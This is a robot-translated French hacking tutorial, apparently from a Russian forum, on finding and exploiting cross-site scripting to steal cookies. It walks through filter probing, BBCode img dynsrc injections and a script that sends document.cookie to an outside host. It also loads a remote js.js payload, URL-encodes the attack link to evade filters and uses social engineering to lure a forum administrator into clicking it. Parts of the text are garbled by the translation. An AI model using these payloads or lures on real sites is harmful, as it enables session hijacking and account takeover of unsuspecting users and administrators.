This page has been robot translated, sorry for typos if any. Original content here.

Description Xss de A à Z.



  • Xss est Css => Cross Site Scripting
  • Comment utiliser XSS
  • Qu'est-ce qu'une attaque XSS?
  • Qu'est-ce que XSS passif et actif?
  • Donc, je vais aller spécifiquement à la façon de trouver dans ce site XSS.
  • Et comment déterminer s'il y a un filtre ou pas?
  • Active XSS
  • Nous avons continué à faire des codes de type tout le temps
  • Comment puis-je le remplacer par un lien avec Xss?


  • Xss est Css => Cross Site Scripting

    Ne pas être confondu avec CSS est également appelé XSS
    Pour la première fois, ce BAG est apparu en 1997.



    Comment utiliser XSS.


    Nous devons d'abord savoir ce qu'est un cookie.
    Si vous le savez, vous pouvez sauter.

    Les cookies sont utilisés pour stocker les informations d'identification du site sur l'ordinateur du visiteur.
    Si vous vous êtes inscrit sur le site sous le surnom de 'blabluble', le site a enregistré un fichier avec des cookies sur votre ordinateur, où vos données sont encodées.
    Et si vous avez un administrateur et que vous avez accès au site, et que je suis un utilisateur qui vous a volé (admin) des cookies, je peux me rendre sur le site et le site me définit comme 'admin'.

    Pour changer (remplacer volé) cuisinier je vous conseille d'utiliser CookieEdit pour IE ou des fonctions intégrées dans Opera et Firefox.

    Pour intercepter les cookies, vous devez trouver une place sur le site où vous pouvez effectuer une attaque XSS.


    Qu'est-ce qu'une attaque XSS?


    Les attaques XSS ne sont pas des attaques sur le site lui-même, mais sur les utilisateurs du site.
    XSS est un défaut dans le filtre, l'application.

    Il y a XSS passif et XSS actif.

    Qu'est-ce que XSS passif et actif?


    Passif - ce Xss, qui oblige la victime à participer directement + il y a des limitations et des difficultés spécifiques.
    Par conséquent, XSS passif n'est pas très apprécié.
    Par exemple, vous devez le faire passer par un lien toxique, ce qui nécessitera une ingénierie sociale, de la ruse.

    Actif - ce XSS, qui ne nécessite aucune action supplémentaire de la victime - il suffit juste d'ouvrir la page avec votre XSS et le code Java sera exécuté automatiquement.
    Merci à leur automatisation - ils sont très utiles et précieux.
    Par exemple, xss actif existe dans les balises BB en raison d'un filtrage insuffisant, lorsque vous laissez un message sur le forum \ guestbook \ chat, qui sera toujours actif à chaque mise à jour.




    Donc, je vais aller spécifiquement à la façon de trouver dans ce site XSS.


    Comme je l'ai écrit plus tôt que XSS se compose de tags, ils sont également constitués de html, et javascript =).

    Javascript peut être entré en html.
    Peut être encodé pour contourner les filtres. Mais plus sur cela plus tard.

    Comment savez-vous que XSS sur un site donné traverse?
    Horrible freakiness de type
    <script> alert () </ script> Nous essayons d'insérer ce script dans tous les différents champs ... si un message a été généré, le script a été traité et exécuté.

    Le XSS le plus courant (observé dans tous les endroits où le mauvais filtrage):

    "> <script> alert () </ script>

    Le point entier est "> .

    Pensons à ce que nous faisons quand nous tapons dans le champ "> <script> alert () </ script> , que se passe-t-il?

    Nous introduisons une variable sous la forme "> <script> alert () </ script> d' une variable." La variable est traitée, "> exécute, ferme

    script et appelle <script> alert () </ script>

    Ce XSS est le plus populaire dans les moteurs de recherche:

    Nous analysons tous les champs du site et essayons d'insérer "> <script> alert () </ script>
    Si le message est sorti - vous avez trouvé XSS ...




    Et comment déterminer s'il y a un filtre ou pas?


    Dans n'importe quel champ, entrez: '';! - "<########> = & {()}
    Ensuite, ouvrez la page html et cherchez le mot "########"
    et voir le sivoli suivant ..

    Si <> c'est le premier signe de la vulnérabilité, alors le filtre a un trou.
    Si "\ \ caractères sont les mêmes que ceux qui ont été entrés - c'est le deuxième signe de la vulnérabilité - caractères supplémentaires possibles pour l'attaque XSS suivante.
    Ensuite, si vous avez ouvert HTML, vous n'avez pas trouvé <> alors très probablement un trou dans le filtre.
    Si vous ouvrez HTML, vous trouvez que <> est remplacé par d'autres caractères, alors ceci est un bummer - un filtre à
    ça fonctionne normalement.
    Il est également possible d'entrer ce qui suit dans le champ pour vérifier le filtrage: "> <> '" `, / \? @%

    Considérons le cas si le filtre mange <>

    Dans ce cas, il y a une probabilité de trou.
    Par exemple, le filtre a la condition de manger <script>, <> et.
    Ensuite, essayez le script <zxcvb: alert ();

    Le filtre semble que rien n'est dangereux dans le script java <IMG% 20SRC = ": alert (), non, il se ferme et par conséquent
    l'exécution du script.

    Bien sûr, si le filtre ne filtre pas les différents encodages, vous pouvez essayer d'encoder le script et d'insérer le code.

    Tout ce que vous avez à essayer de trouver ...
    Essayez d'entrer dans les champs et examinez attentivement ce que nous avons obtenu du filtre.
    La méthode de tyke pour comprendre comment fonctionne le filtre, s'il a des défauts.
    Si le filtre est mauvais, nous pouvons toujours insérer des scripts.




    Active XSS


    Ici, il est nécessaire d'utiliser les balises autorisées et pour les masquer, vous devez exécuter la requête.

    Par exemple, les balises url, bb, img.
    Tout le point d'insertion est que nous devons incorporer la requête dans la parité img ou url. Img a beaucoup de paramètres sauf src et alt.
    Ce bug est très souvent utilisé sur le forum, dans les livres d'or ...

    Considérez XSS actif.

    Avertissements !!!

    Les balises [fon * t], [im * g], [ur * l] sont écrites avec * pour s'assurer qu'elles ne fusionnent pas avec le code du site.
    Pour utiliser ces balises, supprimez * .

    Par exemple, passez en revue le forum pour l'utilisation des balises [fon * t], [im * g], [ur * l] et essayez d'insérer un script ou combinez-les:

    [im * g] httr: //www.qwewqw.ru/1.jpg [/ im * g] Il y a une croix ... signifie que img est utilisé et nous l'avons ramassé (c'est juste qu'il y a img activé, et les admins de créer un message, il est supprimé, ils disent que les images ne peuvent pas être insérées et il peut être utilisé
    différentes formes) s'il n'y a pas de croix ... et l'inscription entière pend, alors essayez ceci:
    [im * g src = httr: //www.qwewqw.ru/1.jpg]

    Eh bien, par exemple, nous avons obtenu une croix par ceci:
    [im * g] httr: //www.qweqw.ru/1.jpg [/ im * g]

    Vérifions si le filtre contient un espace, ajoutez un espace après l'extension jpg:
    [im * g] httr: //www.qweqw.ru/1.jpg [/ im * g]
    s'il y a une croix - alors tout va bien.

    En outre, il existe des paramètres img dynsrc et lowsrc qui contiennent javascript. Nous essayons d'insérer par exemple:
    [im * g] http://www.qwewqw.ru/1.jpg dynsrc = script java: alert () [/ im * g]
    vérifier, envoyer - envoyer un message - cela signifie que vous avez trouvé le XSS actif et au lieu de alert () vous pouvez insérer n'importe quel script.

    Si le filtre n'abandonne pas, essayez ceci:
    [im * g] http://www.qweqw.ru/ "/ dynsrc =" script java: alert () "/ 1.jpg [/ im * g]
    et
    [im * g] http://www.qwewqw.ru/ "/ dynsrc = script java: alert () / 1.jpg [/ im * g]

    Si, à partir des exemples ci-dessus, une croix est obtenue, alors httr: //www.qweqw.ru/1.jpg est remplacé par l'adresse du renifleur.

    Il y a des moments où jpg est désactivé par l'administrateur.




    Nous avons continué à faire des codes comme:


    <script>alert('HakNet')</script>
    java script:alert('HakNet')
    java script:alert('HakNet')/1.jpg и так далие..
    Mais ils n'apportent aucun avantage, ce ne sont que les codes pour tester (tester) sur Xss.

    Voici le script:
    <script>
    img = new Image();
    img.src = "http://antichat.org/s/HakNet.gif?"+document.cookie;
    </script>
    Il vole déjà des cookies =)




    Comment puis-je le remplacer par un lien avec Xss?


    Oui, très facile ...
    Il y a plusieurs options:

    - 1) nous faisons ceci:
    http://*****.ru/free?p='><script>img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;"+document.cookie;</script> où **** le site avec Xss.

    Voici le script compilé:
    '><script>img = new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;</script>
    - 2) Vous pouvez toujours faire ceci:
    http://*****.ru/free?p='><script src=http://haknet.h16.ru/script/js.js></script> où il se réfère à http: // haknet .h16.ru / script / js.js

    et dans js.js il y a:
    img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie; cette méthode est plus fiable.

    Mais comme je l'ai déjà écrit - il y a parfois des difficultés avec les filtres sur le site (notre script ne roule pas).
    Ensuite, vous devez réfléchir à la façon de contourner le problème.
    Vous pouvez simplement ajouter quelque chose, changer quelque chose ou le supprimer dans le script.
    Mais il existe une option plus fiable lorsque nous codons simplement le script. Pour cela, il y a beaucoup de progs.
    Il existe un site tel que http://ha.ckers.org/xss.html (encoder-decoder).

    Voici un exemple:
    %68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E
    il a été codé:

    http://*****.ru/free?p='><script src=http://haknet.h16.ru/script/js.js></script>
    - 3) En particulier le cryptage est nécessaire non seulement pour tromper les filtres, mais aussi pour tromper ADMIN lors de l'utilisation de CSU passive.

    Voici un exemple basé sur l'ingénierie sociale.
    Nous cherchons un contact avec l'administrateur du forum, nous lui lançons un lien vers son site dans le forum, et il dit "la fonctionnalité est tellement cool sur le site" et jusqu'à présent dans le même esprit.
    Et sur notre site sera comme vous l'avez déjà deviné =) voici le script:

    <script language="JavaScript">
    document.location.href="%68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E"
    </script>

    Qu'est-ce que document.location.href me demandez-vous? )) .. Ceci est un code Java, qui, sans une demande, passe au site spécifié, donc cho, nous obtenons, nous donnons le lien à l'administrateur, et il va sur notre site, c'est ce qui est fait .. il jette rapidement

    %68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E et ceci est déjà notre Xss sous forme cryptée.

    Note: ceci ne fonctionnera que lorsque Xss appartiendra à l'administrateur du site à qui vous avez laissé tomber le lien ...
    En d'autres termes, la DIFFICULTE DE LA CSU PASSIVE est que la vulnérabilité ne peut être utilisée que si la victime est AUTORISÉE sur un site vulnérable !!!